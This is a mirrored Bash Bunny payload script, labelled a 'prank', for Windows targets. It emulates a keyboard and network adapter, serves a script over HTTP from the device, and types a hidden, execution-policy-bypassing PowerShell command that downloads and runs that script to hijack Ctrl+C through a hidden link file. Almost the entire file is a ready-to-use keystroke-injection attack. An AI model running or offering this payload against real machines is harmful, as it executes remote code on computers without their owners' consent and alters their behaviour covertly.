mirror of
https://github.com/hak5/bashbunny-payloads.git
synced 2026-05-04 07:05:44 +01:00
37 lines
1.0 KiB
Bash
37 lines
1.0 KiB
Bash
#!/bin/bash
|
|
# Title: Hi There
|
|
# Description: Creates a hidden link file that override the ctrl+c functionality.
|
|
# So, when the user press ctrl+c it lunches the first sign-in animation.
|
|
# Author: Cribbit
|
|
# Version: 1.0
|
|
# Category: Pranks
|
|
# Target: Windows (Powershell 5.1+)
|
|
# Attackmodes: RNDIS_ETHERNET HID
|
|
# Props: v3ded, Hexacorn and Audibleblink (Python Server)
|
|
|
|
LED SETUP
|
|
ATTACKMODE RNDIS_ETHERNET HID
|
|
|
|
GET SWITCH_POSITION
|
|
GET HOST_IP
|
|
|
|
|
|
cd /root/udisk/payloads/$SWITCH_POSITION/
|
|
|
|
# starting server
|
|
LED SPECIAL
|
|
|
|
# disallow outgoing dns requests so server starts immediately
|
|
iptables -A OUTPUT -p udp --dport 53 -j DROP
|
|
python -m SimpleHTTPServer 80 &
|
|
|
|
# wait until port is listening
|
|
while ! nc -z localhost 80; do sleep 0.2; done
|
|
|
|
# attack commences
|
|
LED ATTACK
|
|
QUACK DELAY 200
|
|
RUN WIN "powershell -Noni -NoP -W h -EP Bypass -C \"iex (New-Object Net.WebClient).DownloadString('http://$HOST_IP/s')\""
|
|
QUACK DELAY 500
|
|
QUACK CTRL c
|
|
LED FINISH |